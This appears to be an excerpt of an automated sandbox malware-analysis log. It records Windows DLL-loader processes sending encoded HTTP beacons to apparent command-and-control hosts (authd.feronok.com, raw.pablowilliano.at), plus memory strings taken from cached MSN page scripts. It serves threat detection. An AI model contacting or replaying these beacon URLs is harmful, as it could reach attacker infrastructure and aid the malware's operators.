Source: global traffic	HTTP traffic detected: GET /hmMzQKK9IpZemMI/AV6w9eELu1YSVPBd2B/U2fmYepaP/iI8O34L03l282SsJYJjt/THEo6G77tTZkWbFjswk/x5coSmyB_2F4jLyj_2BWzi/6brroK7xJ8XZw/qfOP9LCj/GvL6W_2BEyoAwzvHXO966ph/vsMK1fkmb9/Ds2jsNIzoVo0lOo11/93YGENzA_2FI/YQv31Ede4MT/_2F4pMgtrANakD/LvbGaJL2nZYMuK54K4Biv/2JptecryCAf4aMir/HTQaPZnOQ8GVTpZ/KhSSbNSk98bViqYzXp/G1toKGfzW/IDNKIf6dXCyDW/4KEp6m HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: authd.feronok.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /OH175Zchtr5XCiZumX3nwAg/_2FAbOw7Yf/Z3HrOA2tCuHkK0wx_/2BSl8k36vM_2/BmUwT9vi5ds/IzgeuD6q87gFwZ/84qOsYKFhKxVr6L0Cag3l/PL1RiNFP_2BXA4Cd/ksDe_2BH0hSy4qr/ZjPn7VhnaRpwImnOZ4/d0Piqs_2F/AJoXR13SZzOA0tqrByvJ/vMFrOLoWX0owBj80j0g/nPQR2b2kCMyMldOZ2WWvYd/aoe4QO8ibbCp3/q_2Bre6L/dJzbiZ3n5z4pEwkiyFez6gn/uNwx7h8FiM/chP3D4vmodPyh8n0y/tjNup8GzZEvE/7l7rBmGdOaq/dgKOoGhW3lw/NG HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: raw.pablowilliano.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: raw.pablowilliano.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /VMv7LJ_2BvHL1lAyBiIjOC/_2B7R5c5uBmVX/X_2BYOAz/c0JLWfH49Nf9MAo_2BDl4xa/R1AF1HMSTQ/bLaP1J1juReG5ZJVb/QYSvbgDFP8oH/ojoQlsq2pc6/TweVpJheh34_2F/PmYm7ijZzpHxG_2Bxq1LR/SrkvKw6i_2BlV4wH/vfhdf5W6RyIgW5h/R0S83XZWkpNINEYVu_/2B9rBv2eE/EjqvPfSEYxpRm4fbT_2B/jA5sIiGntXF7YquHuq2/5rBOQjeRQGS3CD2NKKgqP5/E1Tupr3fdlgcT/n1xpAp_2/Bp4ISropkyZq5kW1zN7S5jV/Sqm_2BC HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: authd.feronok.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L_2BDt9ytUk/uJ29Pz3DiT6ki3/08jXqEr2Bw1VZtjZ7PHMr/mkp8mx2j_2Fh_2BM/48r5Iz6Z2h_2Bg7/3c0JHMzi_2Bd8uVzJ5/uGDraFJKA/IFdt67IIK9VJ7zdnK4nw/jNbnNqei800ZG6T1Vpc/m9N_2BygQv60O0G4Ym7L1A/5RXKQGdksp5xa/gXKVe3Ly/cvcBIVxMqI3xDpqjvHjrI2T/TRX0RhYRP1/5D3VV1o_2BBhqpq4S/1RvoBIEOAT_2/BplWcAPb1TV/eEr_2FeuF0l_2F/UZ_2BWtCVxiKVpMWxO9UV/wrN6QXkuuYNbanbv/j5MKthTa8X0o6I4/qwxpZ0TO4/bmuUKh0n HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dgzEbQ4OdHi6vrZ8TXtj/42P6D_2FQzGJBqjHjxr/k7tYCNr_2BHR8cgUzK_2Bs/fZKbEnCTwoi6R/nQC9OZqH/TGhDZxT_2FcyK4SWqRZQa7w/41mbt7_2B_/2FtBemIRh9CRKakc_/2FaUTf7brC_2/BoPFXB3WUVS/t0M9Y7B5D9tXCb/3vVm2UdQ7QnBcJ_2B5FZY/HKCjwrAvNhkFAJ9S/42tcvlD5WAdpz7b/tfcmR4KwAA0AIq0GqV/1JYJnedpn/6P_2Bdhq8_2FOGrAw5S1/RksGCiQL0vInFpv93x6/GPB7vBf2Ua61U1JKwYMYBT/W_2BMupqR3OLU/3N2FUTT6/mBp5pryRUA_2Bff/j HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /5rrnAaWEJjP00b_2B56737/B1AfZAlhUgHoA/b2t_2BN4/l5OkLy1VlWuDrrdEILRWWeb/E6W61j9yq8/abuhFDsODTcGxVnWQ/E_2BE3e1OTvy/3WD7TSUbyOm/cpm4396P_2Fjd0/pOy7riIEzmJp_2FxZmWLM/gNpof3_2FnlsfWUd/1743QqIgg_2FQRu/ZKVtHnC8C1xvmv_2B8/vHh2F1obc/m3eV0F3yYMczZiknu1Ew/H6Bi_2BTSpyXLXazxZH/wg8NqLvm2lSF1HlaU3pANa/1U6Z_2BZLYJJ_/2BlaNQcq/ledo9CFvcm_2F6MjGWcFo9L/RAKX4mmp_2/F_2FxtA6ZOAujrSBZ/4yu9h7z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: raw.pablowilliano.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: raw.pablowilliano.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /eRS3IPULaBVyyyM8SI7NTjn/bu9jriHj6t/_2BkcuH0S0KLaBS3B/vkCN9MDcpDQw/CXvn1Uc9Lk5/eTvtAYmWtMxfAC/IbcZg8p7Nqfw4xi6JFwgY/iX8lYPiI0RfUKruW/cRS7MvLhOTcIXvx/A_2F5SdmT8BNOtLhIu/P7uLQkYdw/iuMR5Z51enQS4ZwsoBTP/Dtp84_2B7PB4d6Ih_2F/AlW2oiOiFE_2FnyCSEdY9y/vWCqa6t9PLYnR/oBTHljmW/b1W1259HTZYZTaG9O2900Q0/yz_2FOFMzC/llouIHAJZHwF3f0aR/_2FSLB7YfaTL/BdH925d4dS3/7iDYe3o7fiS/Pl HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: raw.pablowilliano.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /5Fz54n1eAYCx6AoO/trrrFlnJO43_2BT/_2B9XA2Pfv_2FjB9cX/4bvHDQr_2/Fcc1l6ZYgUI7p_2FiVc6/t_2Fl8EaBR1HS_2BNK5/X8y72xR2qjkHaZyrNERbO7/v2peyintdJ24L/Yw8tw7QT/dLXZu5OFhvWbL455USn4LnJ/HMP0smJj_2/FZwXFbprpV3aJCWuX/15bJnANkFNAX/hVoXLTlCLIU/tXHaEx0muHiXJx/btyId5nqGgZC05fEhjIaO/rm6z0UiaoPx_2FiX/TGKuABuP8srX2Ck/eUAi3TXKVNasxDo0P3/laW2oibPa/zBY4kInj1Zn68Xf49Wvw/7KJZdF0VpEe/P HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: raw.pablowilliano.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_2Fb8SL1e_2Bcy1brJLJ_/2BjovsduMdCqU0x4/GQVR4nMtPLQI34Q/jvoS0v2ZfIuYqB_2F9/H14dXc2_2/Bjq_2BEdNrJJI2sl8dBd/0EXv2jUPwYTVqmYCs_2/BvSZuMChVtYZMZS6DsVwap/yVgW08_2Ff8kL/trSm6I_2/FftLBTNnGuYda0Kts3xBoIq/hS7V_2FgQN/zYOOceAjlTgUyD0tU/GveuM_2F9QKt/Dw_2BirtM_2/B5GjUkddBSdTKK/gGHOev3Y5/fKlghW HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1rDskZrGyxwYpYn35/qL0_2BW8aSJn/Xmy8O6y_2F1/vAFFg5sXvrqV3E/5sQNlqY_2FlVqYGBdfPFn/U_2FpF45FRVvtng0/CHSrG3ox4kKO6nz/fa8Bk9I48YJ2mibVvx/L_2Bqol7c/tsQwCAooqkWn6gPAbSWl/QD3zhXOtMzYL6Ym04zh/5_2FgybkUk94HZTf6olCIq/9FN98evTn58b0/8CSSre_2/Bu6Ikb6rwvx1DWohv5RLt4o/e_2BWF_2Bc/d5_2Fp_2BgsUfGW3Y/Tgn5X_2Fo_2B/ZZIMFZgAKXa/ZNoVGytLkCHCdG/XBDYst2ree/Zgtmz5W2Tq8P/H HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ATiL3P87_2FBLJR/BC5BJn8dyTtQ6ffd5W/0yM3sHqjA/PUUhyvXz10qPy3rbOoEV/mxXTz5GEf_2FJ1a_2BK/ZfrLOk2W31qhtbg9JWUwPE/hN5bUcB50eKT_/2BNd8E_2/FZi_2BFfGni4E2JjnbevSKB/8h9tWV54XR/zR1VMEFW8ZFskTIvF/Gph5WUak2QX5/sVOcmn1nNvc/RnK_2B00CLgf0I/K7lgIJJ7sya5Al4fACOfm/BvxQs3fAG6a0MebC/NKtDiZMQRT60IUJ/f0dP0RsUXiNDqIW54v/LL56Tq1vM/s_2FlHH5u86U7q76_2Ft/4GmpUkuUY0whYNq9pWf/DCuUzAdQ/8 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tTVUy7Cis4PjZzw3zlK90/992fZ2V2UadpUOjx/ZlFfFNzzz_2BNMC/rw9ORkrACS_2FSnAjs/_2FkBi36_/2BcKHehCiVzJ0ZlxZwUe/L605o3IJbqARL43QjWI/5xKrHdjyff8x2rKCgmO7Mu/SD9GyKc_2FBsi/PnW3TDEt/vmXdCw3sFAveNrYKm6TcRex/ohSiZG5THC/3RxSnoz2RW1R2SJHo/_2BwMcdQnslY/eZbgGLoqDt1/hcHL1ijHz1HAC4/B1wguCo7y8KJKFrVLMood/ADnIvNjKfSqFXvOX/vfzJTRrlv1hKd_2/FiJ_2B9pSc20z1/m HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /V0Zdil_2B8IErAOIy/9Ot8_2B759bg/T54gq_2BJbB/fEKg5_2BdBbLTl/sPD_2B_2FnvdcEMKMRo_2/F5OjjPaAspe7o4IE/EqFxzHwYABNSlAE/lleSQROZ4w0qJdPqAF/2uvD9hc1W/12Vnc8IsQCLFh17B6tDt/cKmqUuBU2BwRALjP8bK/qTWq5ZVsfRFHRSRiWcw9bb/QVGOld7VBpWc2/BxulCusO/edEIsjDQMiIt9Z1TfDqldTW/y_2FZW0fap/KxSo1EYJZ0Ju_2Fb0/HNbtGKevtru9/sVQobl_2Fhi/LbDUGWF1rDaSkY/Bqnt50gbD/FtzmqLc_/2B HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: raw.pablowilliano.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ds3WDeXoOEmk7Y/QQuMPDNsrQWDpsNbTxUBm/9C_2Ffsfwo9FuQBR/xjorKLEJMlfL0A2/CNDB50xXgmy2p4EWxn/DaMjDghfb/cWK8m8ncHHGRZhGMepDc/nDGGUvCSKIWD73abwqz/PSlYxoNGoul9uvoUM2lkYp/iUEvsJec7I6HC/9f5WLr8u/422hTa5FmMbzsZrrYeL5ZCh/Hr1urRNWuy/StfzJRwO7PFWr_2Ft/9TWK1WqIM09Q/q8nrTS3QqnI/jfRzgUIatEJnmp/MqYnHLVMk2JoJoUVcpg0A/FnIEAZIY/9xBtC9wkdw5/g HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: raw.pablowilliano.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sX4dtwL7bay/rzZGwpnfzczFz3/LsBuX9huxqt_2FdLEMzat/b0BQWHIzHX0afe_2/FzCUWEL0PZc9lgZ/f8naaH0uh3Zi_2FkoD/wcVz9D_2B/K2spupldujIpl6_2F1IN/JJZEthD_2BqNHOG7vWe/xU83hDn75Y_2F7X6pQsqWS/nSOIIPGElOe7E/yCFiYhwx/d939bK9w5BMC_2FRQXloMhp/DAOEqmyIWw/Kzds0FoPo7LNhBc8B/xBOXP4CWJl3D/MzbHOxNvkUe/vW0lC6SpHq1YUw/_2FL2CiRudBOqo8KHNdva/PDtAk_2BKn3r_2Fw/8rN45Wd5_2BHZeB/mZ8NMbVb5wYhbTA5w/V_2B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:86.0) Gecko/20100101 Firefox/86.0Host: raw.pablowilliano.at
Source: global traffic	HTTP traffic detected: GET /fNUjDf7_2/FCXdH_2BoIzulRdpyRrN/VegwLwgBgX3FZ3e7Kml/JNpfVfiUw9hrvE_2BrMey8/9KmQXXHW4gs3a/9wgniy83/wKdGA8aJWZ5vZIo_2FiHAUb/zP0hJ_2BZH/ieJtaC2qsJk3_2Fow/0ttQYgmKdzve/ExwbYpZnP5c/82RPIPzJe1gOLF/_2BRc7ZeEUGg3SmE1TpuS/gPPWxB_2BjL0KDQa/cEkcJSpFensONz2/JuZCF1CCARKPWeUk_2/FvcrH8CIA/yx05ZSmlcDL9ZKkPz_2F/hnEgW0PJ8VaXmVS3OM5/DCOZcdQW8DmkgDTa3ilYTz/BNbEyiVfi1Qod/CczdZH_2BY/L HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: raw.pablowilliano.atConnection: Keep-Alive

Source: de-ch[1].htm.6.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8f40973d,0x01d758aa</date><accdate>0x8f40973d,0x01d758aa</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.6.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.6.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	String found in binary or memory: http://authd.feronok.com/1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_
Source: {17550680-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://authd.feronok.com/1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_2Fb8S
Source: loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	String found in binary or memory: http://authd.feronok.com/1rDskZrGyxwYpYn35/qL0_2BW8aSJn/Xmy8O6y_2F1/vAFFg5sXvrqV3E/5sQNlqY_2FlV
Source: {17550682-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr, ~DFCB466DF04067B9CF.TMP.4.dr	String found in binary or memory: http://authd.feronok.com/1rDskZrGyxwYpYn35/qL0_2BW8aSJn/Xmy8O6y_2F1/vAFFg5sXvrqV3E/5sQNlqY_2FlVqYGBd
Source: {17550684-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://authd.feronok.com/ATiL3P87_2FBLJR/BC5BJn8dyTtQ6ffd5W/0yM3sHqjA/PUUhyvXz10qPy3rbOoEV/mxXTz5GEf
Source: {FC3DF8C6-C49D-11EB-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://authd.feronok.com/L_2BDt9ytUk/uJ29Pz3DiT6ki3/08jXqEr2Bw1VZtjZ7PHMr/mkp8mx2j_2Fh_2BM/48r5Iz6Z2
Source: ~DF18426F049004E0E1.TMP.4.dr, {FC3DF8C4-C49D-11EB-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://authd.feronok.com/VMv7LJ_2BvHL1lAyBiIjOC/_2B7R5c5uBmVX/X_2BYOAz/c0JLWfH49Nf9MAo_2BDl4xa/R1AF1
Source: {02B5BFEA-C49E-11EB-90EB-ECF4BBEA1588}.dat.4.dr	String found in binary or memory: http://authd.feronok.com/dgzEbQ4OdHi6vrZ8TXtj/42P6D_2FQzGJBqjHjxr/k7tYCNr_2BHR8cgUzK_2Bs/fZKbEnCTwoi
